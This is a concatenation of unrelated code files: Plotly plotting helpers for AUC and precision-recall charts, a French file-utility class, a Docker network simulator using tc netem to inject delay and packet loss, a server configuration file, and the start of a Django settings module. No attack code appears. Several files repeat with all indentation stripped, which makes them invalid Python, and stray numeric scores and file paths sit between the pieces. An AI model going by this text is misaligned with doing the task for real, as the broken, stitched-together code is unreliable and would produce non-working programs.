        title="Precision-Recall curves, organism-wise",
    )
    figure.update_xaxes(range=XRANGE)
    figure.update_yaxes(range=YRANGE)
    return figure
def plot_auc_dist(df: DataFrame, per: config.Per) -> Figure:
    """
    Plot the AUC distribution as a histogram with a rug marginal.

    Parameters
    ----------
    df
        DataFrame with one row per (entity, e-value); duplicates over the
        chosen key columns are dropped before plotting so each entity is
        counted once.
    per
        Aggregation level: organism-wise or profile-wise.
    """
    if per == config.Per.organism:
        color: Optional[str] = "domain"
        fields = ["organism", "domain"]
        hover_data = [config.label.auc, config.label.hmmer_hits]
    else:
        color = None
        hover_data = [per.name, "clan", config.label.auc, config.label.hmmer_hits]
        # Deduplicate in case per.name collides with one of the fixed labels.
        hover_data = list(set(hover_data))
        fields = [per.name, "clan", config.label.auc, config.label.hmmer_hits]
        fields = list(set(fields))
    title = f"AUC distribution, {per.name}-wise"
    # Keep a single row per unique key combination before histogramming.
    df = df.drop_duplicates(fields)
    fig = px.histogram(
        df,
        x=config.label.auc,
        color=color,
        title=title,
        marginal="rug",
        hover_data=hover_data,
        hover_name=per.name,
        nbins=NBINS,
    )
    fig.update_xaxes(range=XRANGE)
    return fig
def plot_auc_scatter(df: DataFrame, per: config.Per) -> Figure:
    """Scatter AUC per entity, sorted by AUC, with a violin marginal on y."""
    # hover_name is per.name in both branches, so it is hoisted here.
    hover_name = per.name
    if per == config.Per.organism:
        color: Optional[str] = "domain"
        hover_data = ["domain", config.label.auc, config.label.hmmer_hits]
        fields = ["organism", "domain"]
    else:
        color = None
        hover_data = [per.name, "clan", config.label.auc, config.label.hmmer_hits]
        fields = [per.name, "clan", config.label.auc, config.label.hmmer_hits]
    fields = list(set(fields))
    df = df.drop_duplicates(fields)
    df = df.sort_values(config.label.auc)
    fig = px.scatter(
        df,
        x=per.name,
        y=config.label.auc,
        color=color,
        title=f"AUC scatter, {per.name}-wise",
        hover_data=hover_data,
        hover_name=hover_name,
        marginal_y="violin",
    )
    fig.update_layout(showlegend=False)
    fig.update_yaxes(range=YRANGE)
    return fig
def plot_score_boxplot(dfe: DataFrame, per: config.Per) -> Figure:
    """
    Plot a score boxplot (precision, recall and F1) per -log10(e-value).

    Parameters
    ----------
    dfe
        DataFrame with precision, recall and F1-score columns plus a
        "-log10(e-value)" column.  (Docstring fix: the original documented a
        nonexistent ``df`` parameter and misspelled "boxplot".)
    per
        Aggregation level (organism-wise or profile-wise).

    Returns
    -------
    Figure
        Boxplot of the three scores, grouped by e-value threshold.
    """

    def _melt(score_label: str, score_name: str) -> DataFrame:
        # Move one score column into a generic "value" column and tag the
        # rows with the score name so the three frames can be stacked.
        part = dfe.copy()
        part["value"] = part[score_label]
        del part[score_label]
        part["score"] = score_name
        return part

    precision = _melt(config.label.precision, "precision")
    recall = _melt(config.label.recall, "recall")
    f1score = _melt(config.label.f1score, config.label.f1score)
    if per == config.Per.organism:
        hover_data = [
            "organism",
            "domain",
            config.label.auc,
            config.label.hmmer_hits,
        ]
    else:
        hover_data = [
            per.name,
            "clan",
            config.label.auc,
            config.label.hmmer_hits,
        ]
        # Deduplicate in case per.name collides with one of the fixed labels.
        hover_data = list(set(hover_data))
    # NOTE: the original also computed a `fields` list here; it was never
    # used, so it has been removed as dead code.
    dfe = pd.concat([precision, recall, f1score])
    fig = px.box(
        dfe,
        x="-log10(e-value)",
        color="score",
        y="value",
        title=f"Score boxplot, {per.name}-wise",
        hover_name=per.name,
        hover_data=hover_data,
    )
    fig.update_yaxes(range=YRANGE)
    return fig
def plot_pr_scatter(dfe: DataFrame, per: config.Per, size_max: int) -> Figure:
    """
    Plot Precision-Recall scatter, animated over e-value thresholds.

    Parameters
    ----------
    dfe
        DataFrame with precision/recall columns and one animation frame per
        "e-value".
    per
        Aggregation level (organism-wise or profile-wise).
    size_max
        Maximum marker size passed to plotly.

    Returns
    -------
    Figure
        The scatter figure.  Bug fix: the original called ``fig.show()`` and
        implicitly returned ``None``, contradicting the ``-> Figure``
        annotation and the convention of every sibling ``plot_*`` helper.
    """
    if per == config.Per.organism:
        color: Optional[str] = "domain"
        hover_data = [
            "organism",
            "domain",
            config.label.f1score,
            config.label.auc,
            config.label.hmmer_hits,
        ]
    else:
        color = None
        hover_data = [
            per.name,
            "clan",
            config.label.f1score,
            config.label.auc,
            config.label.hmmer_hits,
        ]
    title = f"Precision vs Recall, {per.name}-wise"
    fig = px.scatter(
        dfe,
        x=config.label.recall,
        y=config.label.precision,
        animation_frame="e-value",
        color=color,
        title=title,
        size=config.label.hmmer_hits,
        size_max=size_max,
        hover_data=hover_data,
        hover_name=per.name,
    )
    fig.update_layout(showlegend=False)
    fig.update_xaxes(range=XRANGE)
    fig.update_yaxes(range=YRANGE)
    # Callers decide whether to show or save the figure.
    return fig
import os
from pathlib import Path
import shutil
"""------[ Class ]---------"""
class UtilsFichier():
    """File-system helper utilities: existence checks, read/write, copy/move,
    and directory/file listing.  Error messages remain in French (runtime
    strings); documentation is in English."""

    def __init__(self, repertoire='', fichier=''):
        # Default directory and file name; most methods also take explicit
        # arguments and do not read these attributes.
        self.c_fic = fichier
        self.c_dir = repertoire

    def isCheminExiste(self, c_dir="") -> bool:
        """Return True if the path (directory) exists.

        Bug fix: the original printed the "file" message here and the
        "directory" message in isFichierExiste — the two were swapped.
        """
        if not os.path.exists(c_dir):
            print("Le répertoire n'existe pas ou est introuvable.")
            return False
        return True

    def isFichierExiste(self, c_fic, c_dir="") -> bool:
        """Return True if the file c_dir/c_fic exists."""
        if not os.path.isfile(os.path.join(c_fic) if not c_dir else os.path.join(c_dir, c_fic)):
            print("Le fichier n'existe pas ou est introuvable.")
            return False
        return True

    def FichierExiste(self, c_fic, c_dir) -> bool:
        """Return True if c_dir/c_fic exists and is a regular file.

        Bug fix: the original fell through and returned None on failure;
        it now returns an explicit False (backward compatible — both falsy).
        """
        chemin = os.path.join(c_dir, c_fic)
        if not (os.path.exists(chemin) and os.path.isfile(chemin)):
            print("Le fichier ou le répertoire n'existe pas ou est introuvable.")
            return False
        return True

    # Reading the configuration file
    def ChargeFic(self, c_fic, c_dir):
        """Read and return the entire content of c_dir/c_fic.

        Returns None if the file cannot be read (OSError); exits via quit()
        on any other error, matching the original behavior.
        """
        try:
            # `with` guarantees the handle is closed even if read() raises,
            # fixing the leak in the original open()/read()/close() sequence.
            with open(os.path.join(c_dir, c_fic)) as file:
                return file.read()
        except OSError:
            err = "Fichier non trouvé"
            print("\n")
            print("Impossible de Lire le Fichier ({}), le script se termine.".format(err))
            print("\n")
        except Exception as ex:
            print(ex)
            print("Impossible de continuer (%s), le script se termine.")
            # TODO: raise instead of quitting
            quit()

    def CreerRep(self, c_dir):
        """Create directory c_dir if missing (single level, like the original).

        Path(c_dir).mkdir(parents=True, exist_ok=True) would also create
        parents; kept single-level to preserve behavior.
        """
        if not os.path.exists(c_dir):
            os.mkdir(c_dir)

    def EcritFic(self, c_fic, c_dir="", c_Content="", c_mode='w'):
        """Write c_Content to c_dir/c_fic (mode 'w' by default); no-op when
        c_Content is empty."""
        if c_Content:
            with open(os.path.join(c_dir, c_fic), c_mode) as f:
                f.write(c_Content)

    def CopyFic(self, c_fic, c_ficdest) -> bool:
        """Copy a file; return True when the copy landed at c_ficdest.

        Bug fix: the original returned None (instead of False) when
        shutil.copy returned a different path, e.g. copying into a directory.
        """
        new_file = shutil.copy(c_fic, c_ficdest, follow_symlinks=False)
        return new_file == c_ficdest

    def MoveFic(self, c_fic, c_dest):
        """Move a file to another file or a directory.

        Bug fix: the original passed copy_function='copy2' (a string), but
        shutil.move requires a callable — any cross-filesystem move raised
        TypeError.  shutil.copy2 is the documented default callable.
        """
        shutil.move(c_fic, c_dest, copy_function=shutil.copy2)

    def EffaceFic(self, c_fic):
        """Delete a file."""
        Path(c_fic).unlink()

    def getListRep(self, c_dir='.'):
        """Return the list of sub-directory paths (as strings) of c_dir."""
        return [os.fspath(entry) for entry in Path(c_dir).iterdir() if entry.is_dir()]

    def getListFile(self, c_dir='.', c_filtre='*.py'):
        """Return the list of files in c_dir matching the glob c_filtre.

        Parameters
        ----------
        c_dir : str
            Source directory.
        c_filtre : str
            Glob pattern to apply.

        Returns
        -------
        list of str
            Matching file paths.
        """
        return [os.fspath(entry) for entry in Path(c_dir).glob(c_filtre) if entry.is_file()]
import os
from pathlib import Path
import shutil
"""------[ Class ]---------"""
class UtilsFichier():
def __init__(self, repertoire='', fichier=''):
self.c_fic = fichier
self.c_dir = repertoire
def isCheminExiste(self, c_dir="") -> bool:
"""Test si le répertoire existe."""
if not os.path.exists(c_dir):
print("Le fichier n'existe pas ou est introuvable.")
return False
else:
return True
def isFichierExiste(self, c_fic, c_dir="") -> bool:
"""Test si le fichier existe."""
if not os.path.isfile(os.path.join(c_dir, c_fic)):
print("Le répertoire n'existe pas ou est introuvable.")
return False
else:
return True
def FichierExiste(self, c_fic, c_dir):
if not (os.path.exists(os.path.join(c_dir, c_fic)) and os.path.isfile(os.path.join(c_dir, c_fic))):
print("Le fichier ou le répertoire n'existe pas ou est introuvable.")
# sys.exit()
else:
return True
# Lecture du fichier de configuration
def ChargeFic(self, c_fic, c_dir):
try:
file = open(os.path.join(c_dir, c_fic))
result = file.read()
file.close()
return result
except OSError:
# print(e, file=sys.stderr)
err = "Fichier non trouvé"
print("\n")
print("Impossible de Lire le Fichier ({}), le script se termine.".format(err))
print("\n")
# sys.exit(1)
except Exception as ex:
print(ex)
print("Impossible de continuer (%s), le script se termine.")
# TODO: A ajouter un raise
quit()
def CreerRep(self, c_dir):
"""Creation du repertoire output directory si manquant.
a voir :
Path('/my/directory').mkdir(mode=0o777, parents=True, exist_ok=True)
This recursively creates the directory and does not raise an exception if the directory already exists.
"""
if not os.path.exists(c_dir):
os.mkdir(c_dir)
def EcritFic(self, c_fic, c_dir="", c_Content="", c_mode='w'):
"""Ecrit c_Content dans un fichier."""
if c_Content:
f = open(os.path.join(c_dir, c_fic), c_mode)
f.write(c_Content)
f.close()
def CopyFic(self, c_fic, c_ficdest):
"""Copie un fichier vers un autre."""
new_file = shutil.copy(c_fic, c_ficdest, follow_symlinks=False)
if new_file == c_ficdest:
return True
def MoveFic(self, c_fic, c_dest):
"""Move un fichier vers un autre fichier ou un répertoire."""
shutil.move(c_fic, c_dest, copy_function='copy2')
def EffaceFic(self, c_fic):
"""Effacer un Fichier."""
file_path = Path(c_fic)
file_path.unlink()
def getListRep(self, c_dir='.'):
"""Retourne la liste des répertoires présent dans c_dir."""
p = Path(c_dir)
tmp = [x for x in p.iterdir() if x.is_dir()]
cc = list()
for bcl in tmp:
cc.append(os.fspath(bcl))
return cc
def getListFile(self, c_dir='.', c_filtre='*.py'):
"""Retourne la liste des Fichiers présent dans c_dir.
Parameters
----------
c_dir : str
Le nom du répertoire source
c_filtre : str
Le filtre à appliquer
Raises
------
BaseException
Si le fqdn est incorrect, on retourne None
Returns
-------
list
une liste de strings : Nom de Fichiers
"""
p = Path(c_dir)
cc = list()
curList = list(p.glob(c_filtre))
for bcl in curList:
if bcl.is_file():
cc.append(os.fspath(bcl))
return cc | 0.310172 | 0.274991 |
import os
import subprocess
networks = {}
class Network(object):
    """Book-keeping for one simulated docker network.

    Tracks which containers are attached, the interface each container got
    when it joined, and whether a netem qdisc has already been installed on
    that interface (decides between `tc qdisc add` and `change` later).
    """

    def __init__(self, key, networkName):
        self.key = key                    # map key: sorted container names joined by ";"
        self.networkName = networkName    # docker network name
        self.connectedContainer = {}      # container name -> interface name
        self.netemInitialized = {}        # container name -> bool (qdisc added yet?)

    def isNetemInitialized(self, container):
        return self.netemInitialized[container]

    def setNetemInitialized(self, container, newValue):
        self.netemInitialized[container] = newValue

    def getNetworkName(self):
        return self.networkName

    def connect(self, containerName, interfaceName):
        # A freshly attached container has no netem qdisc yet.
        self.netemInitialized[containerName] = False
        self.connectedContainer[containerName] = interfaceName

    def disconnect(self, containerName):
        self.connectedContainer.pop(containerName, None)

    def getConnectedContainer(self):
        return self.connectedContainer.keys()

    def getInterfaceNameOfConnectedContainer(self, containerName):
        return self.connectedContainer[containerName]

    def printNetwork(self):
        # Debug helper (Python 2 print statements).
        print "Network: " + self.key
        print "Network-Name: " + self.networkName
        print "Connected: "
        for container in self.connectedContainer:
            print container+" : "+self.connectedContainer[container]
def join(actionObject, dockerComposeProjectName):
    """Connect the listed containers in the requested topology.

    Modes: "cluster" (all on one shared network), "row" (pairwise chain),
    "ring" (chain plus a link closing first and last container).
    Returns the worst (max) exit code of the underlying connect calls.
    """
    containerList = actionObject["container"]
    internal = False
    if "internal" in actionObject:
        internal = actionObject["internal"]
    mode = "cluster"
    if "mode" in actionObject:
        mode = actionObject["mode"]
    exitCode = 0
    if mode == "cluster":
        exitCode = connect(containerList, dockerComposeProjectName, internal)
    elif mode == "row" or mode == "ring":
        # Connect consecutive pairs: (0,1), (1,2), ...
        for i in range(0, len(containerList)-1):
            exitCode = max(connect(containerList[i:i+2], dockerComposeProjectName, internal), exitCode)
        # Close the ring
        if mode == "ring":
            exitCode = max(connect([containerList[0], containerList[len(containerList)-1]], dockerComposeProjectName, internal), exitCode)
    return exitCode
def cut(actionObject, dockerComposeProjectName):
    """Disconnect the listed containers from their shared network."""
    containerList = actionObject["container"]
    return disconnect(containerList, dockerComposeProjectName)
def deleteAllNetworks():
    """Delete every docker network created so far; return the max exit code.

    NOTE(review): entries are not removed from the module-level `networks`
    map afterwards, so it keeps stale Network objects — confirm this is only
    used at teardown.
    """
    exitCode = -1
    for key in networks:
        networkName = networks[key].getNetworkName()
        exitCode = max(deleteNetwork(networkName), exitCode)
    return exitCode
def delay(actionObject, dockerComposeProjectName):
    """Apply a netem "delay" to every container of the target network.

    Required key: "time".  Optional: "jitter", "correlation",
    "distribution" — appended in the order `tc ... netem delay` expects.
    """
    time = actionObject["time"]
    if time is None:
        print "You have to set a time"
        return 1
    arguments = [time]
    if "jitter" in actionObject:
        arguments = arguments+[actionObject["jitter"]]
    if "correlation" in actionObject:
        arguments = arguments+[actionObject["correlation"]]
    if "distribution" in actionObject:
        arguments = arguments+["distribution", actionObject["distribution"]]
    return executeNetemCommandsForNetwork(actionObject, dockerComposeProjectName, "delay", arguments)
def duplicate(actionObject, dockerComposeProjectName):
    """Apply netem packet "duplicate" (percentage, optional correlation)."""
    percent = actionObject["percent"]
    arguments = [str(percent)+"%"]
    if "correlation" in actionObject:
        arguments = arguments+[actionObject["correlation"]]
    return executeNetemCommandsForNetwork(actionObject, dockerComposeProjectName, "duplicate", arguments)
def corrupt(actionObject, dockerComposeProjectName):
    """Apply netem packet "corrupt" (percentage, optional correlation)."""
    percent = actionObject["percent"]
    arguments = [str(percent)+"%"]
    if "correlation" in actionObject:
        arguments = arguments+[actionObject["correlation"]]
    return executeNetemCommandsForNetwork(actionObject, dockerComposeProjectName, "corrupt", arguments)
def loss(actionObject, dockerComposeProjectName):
    """Apply netem packet "loss" (percentage, optional correlation)."""
    percent = actionObject["percent"]
    arguments = [str(percent)+"%"]
    if "correlation" in actionObject:
        arguments = arguments+[actionObject["correlation"]]
    return executeNetemCommandsForNetwork(actionObject, dockerComposeProjectName, "loss", arguments)
def connect(containerList, dockerComposeProjectName, internal):
    """Create a fresh docker network and attach every listed container.

    The interface a container gained is detected by diffing /sys/class/net
    before and after the attach.  Returns the max exit code (0 = success,
    1 = already connected / network creation failed).
    """
    containerList = convertToContainerNames(containerList, dockerComposeProjectName)
    print "connect "+str(containerList)
    mapKey = getMapKey(containerList)
    if mapKey in networks:
        print "These containers are already connected"
        return 1
    # get network name
    networkName = createNetwork(internal)
    if networkName == None:
        print "Could not create network"
        return 1
    networks[mapKey] = Network(mapKey, networkName)
    exitCode = -1
    for container in containerList:
        # Detach from the "none" network first; errors/output are discarded.
        subprocess.call(["docker", "network", "disconnect", "none", container], stdout=open(os.devnull, "w"), stderr=subprocess.STDOUT)
        preNetworkInterfaces = getNetworkInterfaces(container)
        localExitCode = subprocess.call(["docker", "network", "connect", networkName, container])
        postNetworkInterfaces = getNetworkInterfaces(container)
        interfaceName = None
        for networkInterface in postNetworkInterfaces:
            if networkInterface not in preNetworkInterfaces:
                interfaceName = networkInterface
        if localExitCode == 0 and interfaceName is not None:
            networks[mapKey].connect(container, interfaceName)
        exitCode = max(exitCode, localExitCode)
    if exitCode != 0:
        print "Could not connect all containers to the network"
    return exitCode
def disconnect(containerList, dockerComposeProjectName):
    """Detach the listed containers from their network, then delete it.

    Returns 0 on full success; 1 when the network is unknown or any
    container failed to disconnect.
    """
    containerList = convertToContainerNames(containerList, dockerComposeProjectName)
    print "disconnect "+str(containerList)
    mapKey = getMapKey(containerList)
    if mapKey not in networks:
        print "This network does not exists"
        return 1
    network = networks[mapKey]
    exitCode = -1
    for container in containerList:
        localExitCode = subprocess.call(["docker", "network", "disconnect", network.getNetworkName(), container])
        if localExitCode == 0:
            network.disconnect(container)
        exitCode = max(exitCode, localExitCode)
    if exitCode != 0:
        print "Could not disconnect all containers from the network"
        return 1
    exitCode = deleteNetwork(network.getNetworkName())
    if exitCode != 0:
        # NOTE(review): "Cloud" is a typo for "Could" in this runtime string.
        print "Cloud not delete the network"
    else:
        networks.pop(mapKey, None)
    return exitCode
def createNetwork(internal):
    """Create a docker network under the first free numbered name.

    Returns the network name, or None if `docker network create` failed.
    """
    i = 0
    networkPrefix = "network-simulator-network_"
    exitCode = 0
    # Returns 0 if network exists
    while subprocess.call(["docker", "network", "inspect", networkPrefix+str(i)], stdout=open(os.devnull, "w"), stderr=subprocess.STDOUT) == 0:
        i += 1
    if internal:
        exitCode = subprocess.call(["docker", "network", "create", "--internal", networkPrefix+str(i)])
    else:
        exitCode = subprocess.call(["docker", "network", "create", networkPrefix+str(i)])
    if exitCode == 0:
        return networkPrefix+str(i)
    return None
def deleteNetwork(networkName):
    """Remove a docker network; returns the `docker network rm` exit code."""
    return subprocess.call(["docker", "network", "rm", networkName])
def getNetworkInterfaces(containerName):
    """List the container's network interface names via /sys/class/net."""
    proc = subprocess.Popen(["docker", "exec", containerName, "ls", "/sys/class/net"], stdout=subprocess.PIPE)
    return proc.stdout.read().split()
def convertToContainerNames(containerList, dockerComposeProjectName):
    """Map compose service names to docker container names (<project>_<svc>_1)."""
    newList = list()
    for container in containerList:
        newList.append(dockerComposeProjectName + "_" + container + "_1")
    return newList
def getMapKey(containerList):
    """Build the `networks` map key: sorted container names joined by ";"."""
    result = ""
    for container in sorted(containerList):
        result = result + container + ";"
    return result
def executeNetemCommandsForNetwork(actionObject, dockerComposeProjectName, command, arguments):
    """Run one netem command on every container attached to the target network.

    Marks each container as netem-initialized on success, so subsequent
    calls use `tc qdisc change` instead of `add`.  Returns the max exit code.
    """
    networkList = convertToContainerNames(actionObject["network"], dockerComposeProjectName)
    networkKey = getMapKey(networkList)
    network = networks[networkKey]
    exitCode = -1
    for container in network.getConnectedContainer():
        localExitCode = executeNetemCommand(network, container, command, arguments)
        if localExitCode == 0:
            network.setNetemInitialized(container, True)
        exitCode = max(localExitCode, exitCode)
    return exitCode
def executeNetemCommand(network, containerName, command, arguments):
    """Run `tc qdisc add|change ... netem <command> <arguments>` in the container."""
    interface = network.getInterfaceNameOfConnectedContainer(containerName)
    netemMode = None
    # First call installs the qdisc ("add"); later calls modify it ("change").
    if not network.isNetemInitialized(containerName):
        netemMode = "add"
    else:
        netemMode = "change"
return subprocess.call(["docker", "exec", containerName, "tc", "qdisc", netemMode, "dev", interface, "root", "netem", command] + arguments) | docker-network-simulator/actions/networkActions.py | import os
import subprocess
networks = {}
class Network(object):
def __init__(self, key, networkName):
self.key = key
self.networkName = networkName
self.connectedContainer = {}
self.netemInitialized = {}
def isNetemInitialized(self, container):
return self.netemInitialized[container]
def setNetemInitialized(self, container, newValue):
self.netemInitialized[container] = newValue
def getNetworkName(self):
return self.networkName
def connect(self, containerName, interfaceName):
self.netemInitialized[containerName] = False
self.connectedContainer[containerName] = interfaceName
def disconnect(self, containerName):
self.connectedContainer.pop(containerName, None)
def getConnectedContainer(self):
return self.connectedContainer.keys()
def getInterfaceNameOfConnectedContainer(self, containerName):
return self.connectedContainer[containerName]
def printNetwork(self):
print "Network: " + self.key
print "Network-Name: " + self.networkName
print "Connected: "
for container in self.connectedContainer:
print container+" : "+self.connectedContainer[container]
def join(actionObject, dockerComposeProjectName):
containerList = actionObject["container"]
internal = False
if "internal" in actionObject:
internal = actionObject["internal"]
mode = "cluster"
if "mode" in actionObject:
mode = actionObject["mode"]
exitCode = 0
if mode == "cluster":
exitCode = connect(containerList, dockerComposeProjectName, internal)
elif mode == "row" or mode == "ring":
for i in range(0, len(containerList)-1):
exitCode = max(connect(containerList[i:i+2], dockerComposeProjectName, internal), exitCode)
# Close the ring
if mode == "ring":
exitCode = max(connect([containerList[0], containerList[len(containerList)-1]], dockerComposeProjectName, internal), exitCode)
return exitCode
def cut(actionObject, dockerComposeProjectName):
containerList = actionObject["container"]
return disconnect(containerList, dockerComposeProjectName)
def deleteAllNetworks():
exitCode = -1
for key in networks:
networkName = networks[key].getNetworkName()
exitCode = max(deleteNetwork(networkName), exitCode)
return exitCode
def delay(actionObject, dockerComposeProjectName):
time = actionObject["time"]
if time is None:
print "You have to set a time"
return 1
arguments = [time]
if "jitter" in actionObject:
arguments = arguments+[actionObject["jitter"]]
if "correlation" in actionObject:
arguments = arguments+[actionObject["correlation"]]
if "distribution" in actionObject:
arguments = arguments+["distribution", actionObject["distribution"]]
return executeNetemCommandsForNetwork(actionObject, dockerComposeProjectName, "delay", arguments)
def duplicate(actionObject, dockerComposeProjectName):
percent = actionObject["percent"]
arguments = [str(percent)+"%"]
if "correlation" in actionObject:
arguments = arguments+[actionObject["correlation"]]
return executeNetemCommandsForNetwork(actionObject, dockerComposeProjectName, "duplicate", arguments)
def corrupt(actionObject, dockerComposeProjectName):
percent = actionObject["percent"]
arguments = [str(percent)+"%"]
if "correlation" in actionObject:
arguments = arguments+[actionObject["correlation"]]
return executeNetemCommandsForNetwork(actionObject, dockerComposeProjectName, "corrupt", arguments)
def loss(actionObject, dockerComposeProjectName):
percent = actionObject["percent"]
arguments = [str(percent)+"%"]
if "correlation" in actionObject:
arguments = arguments+[actionObject["correlation"]]
return executeNetemCommandsForNetwork(actionObject, dockerComposeProjectName, "loss", arguments)
def connect(containerList, dockerComposeProjectName, internal):
containerList = convertToContainerNames(containerList, dockerComposeProjectName)
print "connect "+str(containerList)
mapKey = getMapKey(containerList)
if mapKey in networks:
print "These containers are already connected"
return 1
# get network name
networkName = createNetwork(internal)
if networkName == None:
print "Could not create network"
return 1
networks[mapKey] = Network(mapKey, networkName)
exitCode = -1
for container in containerList:
subprocess.call(["docker", "network", "disconnect", "none", container], stdout=open(os.devnull, "w"), stderr=subprocess.STDOUT)
preNetworkInterfaces = getNetworkInterfaces(container)
localExitCode = subprocess.call(["docker", "network", "connect", networkName, container])
postNetworkInterfaces = getNetworkInterfaces(container)
interfaceName = None
for networkInterface in postNetworkInterfaces:
if networkInterface not in preNetworkInterfaces:
interfaceName = networkInterface
if localExitCode == 0 and interfaceName is not None:
networks[mapKey].connect(container, interfaceName)
exitCode = max(exitCode, localExitCode)
if exitCode != 0:
print "Could not connect all containers to the network"
return exitCode
def disconnect(containerList, dockerComposeProjectName):
containerList = convertToContainerNames(containerList, dockerComposeProjectName)
print "disconnect "+str(containerList)
mapKey = getMapKey(containerList)
if mapKey not in networks:
print "This network does not exists"
return 1
network = networks[mapKey]
exitCode = -1
for container in containerList:
localExitCode = subprocess.call(["docker", "network", "disconnect", network.getNetworkName(), container])
if localExitCode == 0:
network.disconnect(container)
exitCode = max(exitCode, localExitCode)
if exitCode != 0:
print "Could not disconnect all containers from the network"
return 1
exitCode = deleteNetwork(network.getNetworkName())
if exitCode != 0:
print "Cloud not delete the network"
else:
networks.pop(mapKey, None)
return exitCode
def createNetwork(internal):
i = 0
networkPrefix = "network-simulator-network_"
exitCode = 0
# Returns 0 if network exists
while subprocess.call(["docker", "network", "inspect", networkPrefix+str(i)], stdout=open(os.devnull, "w"), stderr=subprocess.STDOUT) == 0:
i += 1
if internal:
exitCode = subprocess.call(["docker", "network", "create", "--internal", networkPrefix+str(i)])
else:
exitCode = subprocess.call(["docker", "network", "create", networkPrefix+str(i)])
if exitCode == 0:
return networkPrefix+str(i)
return None
def deleteNetwork(networkName):
return subprocess.call(["docker", "network", "rm", networkName])
def getNetworkInterfaces(containerName):
proc = subprocess.Popen(["docker", "exec", containerName, "ls", "/sys/class/net"], stdout=subprocess.PIPE)
return proc.stdout.read().split()
def convertToContainerNames(containerList, dockerComposeProjectName):
newList = list()
for container in containerList:
newList.append(dockerComposeProjectName + "_" + container + "_1")
return newList
def getMapKey(containerList):
result = ""
for container in sorted(containerList):
result = result + container + ";"
return result
def executeNetemCommandsForNetwork(actionObject, dockerComposeProjectName, command, arguments):
networkList = convertToContainerNames(actionObject["network"], dockerComposeProjectName)
networkKey = getMapKey(networkList)
network = networks[networkKey]
exitCode = -1
for container in network.getConnectedContainer():
localExitCode = executeNetemCommand(network, container, command, arguments)
if localExitCode == 0:
network.setNetemInitialized(container, True)
exitCode = max(localExitCode, exitCode)
return exitCode
def executeNetemCommand(network, containerName, command, arguments):
interface = network.getInterfaceNameOfConnectedContainer(containerName)
netemMode = None
if not network.isNetemInitialized(containerName):
netemMode = "add"
else:
netemMode = "change"
return subprocess.call(["docker", "exec", containerName, "tc", "qdisc", netemMode, "dev", interface, "root", "netem", command] + arguments) | 0.243373 | 0.122576 |
# The network address to bind the server socket to
# Use "localhost" to restrict access from the local machine.
SERVER_ADDRESS = ""
# The TCP port to listen to
SERVER_PORT = 9099
# The base path for the API. Do not forget the trailing "/"!
# This is the path from which the front-end web server will redirect requests to this back-end.
BASE_PATH = "/data/"
# Path map to modules and their configuration.
# Available modules are:
# - coll: The following item is available:
# - usetex: Boolean to indicate whether to use LaTeX for text formatting
# - sph: The following item is available:
# - dir: Directory where both the configuration file and data files are present.
# - file: Name of a YAML containing the definitions
# - items: Direct definitions (only if "file" is not set or points to a non-existing file)
# Definitions are given as a dictionary, where the keys are the identifiers and the values are dictionaries of three items:
# - file: Path to HDF5 file containing the data
# - desc: Human-readable description of the dataset
# - fields: Array of fields to retrieve from the file and send to the caller. Each item here is dictionary with the following keys:
# - data: Expression to compute the values; it is a mathematical expression parsed by MaExPa with the fields in the dataset available as variables
# - value: Human-readable description of the field
# - unit: Human-readable description of the unit of the data
# - short: Short name of the field; optional, if not set, the "value" key will be used instead
# - db: The following item is available:
# - dir: Directory where both the configuration file and data files are present.
# - file: Name of a YAML containing the definitions
# - items: Direct definitions (only if "file" is not set or points to a non-existing file)
# Definitions are given as a dictionary, where the keys are the identifiers and the values are dictionaries with the following items:
# - file: Path to HDF5 file containing the data
# - desc: Human-readable description of the dataset
# - base_fields: List of fields available for the entire set; each entry is a dictionary with the following keys:
# - name: Field name as it should appear on the resulting data
# - data: Expression to compute the values; it is a mathematical expression parsed by MaExPa with the fields in the dataset available as variables
# - desc: Human-readable description of the field
# - format: Formatting information for the caller
# - fields: Fields to return for each entry in the database
# - name: Field name as it should appear on the resulting data
# - data: Expression to compute the values; it is a mathematical expression parsed by MaExPa with the fields in the dataset available as variables
# - plot: Plotting information. Passed as-is to the output
MODS = {
"coll": ( "coll", {
"usetex": False,
} ),
}
# List of origins from which to allow cross-domain requests.
# This is useful during development when this server is not at the same address as the one providing the user interface.
CORS_ORIGINS = [] | hcds_config.py |
# The network address to bind the server socket to
# Use "localhost" to restrict access from the local machine.
SERVER_ADDRESS = ""
# The TCP port to listen to
SERVER_PORT = 9099
# The base path for the API. Do not forget the trailing "/"!
# This the path that the front-end web server will redirect request to this back-end.
BASE_PATH = "/data/"
# Path map to modules and their configuration.
# Available modules are:
# - coll: The following item is available:
# - usetex: Boolean to indicate whether to use LaTeX for text formatting
# - sph: The following item is available:
# - dir: Directory where both the configuration file and data files are present.
# - file: Name of a YAML containing the definitions
# - items: Direct definitions (only if "file" is not set or points to an non-existing file)
# Definitions are given as a dictionary, where the key are the identifiers and the value another dictionary of three items:
# - file: Path to HDF5 file containing the data
# - desc: Human-reable description of the dataset
# - fields: Array of fields to retrieve from the file and send to the caller. Each item here is dictionary with the following keys:
# - data: Expression to compute the values; it is a mathematical expression parsed by MaExPa with the fields in the dataset available as variables
# - value: Human-readable description of the field
# - unit: Human-readable description of the unit of the data
# - short: Short name of the field; optional, if not set, the "value" key will be used instead
# - db: The following item is available:
# - dir: Directory where both the configuration file and data files are present.
# - file: Name of a YAML containing the definitions
# - items: Direct definitions (only if "file" is not set or points to an non-existing file)
# Definitions are given as a dictionary, where the key are the identifiers and the value another dictionary with the following items:
# - file: Path to HDF5 file containing the data
# - desc: Human-reable description of the dataset
# - base_fields: List of fields available for the entire set; each entry is a dictionary with the following keys:
# - name: Field name as it should appear on the resulting data
# - data: Expression to compute the values; it is a mathematical expression parsed by MaExPa with the fields in the dataset available as variables
# - desc: Human-reable description of the field
# - format: Formatting information for the caller
# - fields: Fields to return for each entry in the database
# - name: Field name as it should appear on the resulting data
# - data: Expression to compute the values; it is a mathematical expression parsed by MaExPa with the fields in the dataset available as variables
# - plot: Plotting information. Passed as-is to the output
MODS = {
"coll": ( "coll", {
"usetex": False,
} ),
}
# List of origins from which to allow cross-domain requests.
# This is useful during development when this server is not at the same address as the one providing the user interface.
CORS_ORIGINS = [] | 0.722135 | 0.547525 |
from pathlib import Path
import cloudinary
import cloudinary.uploader
import cloudinary.api
from dotenv import load_dotenv
import dj_database_url
import sentry_sdk
from sentry_sdk.integrations.django import DjangoIntegration
import os

# Load environment variables from a local .env file (if present) BEFORE any
# setting below reads os.environ.
load_dotenv()

# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve().parent.parent

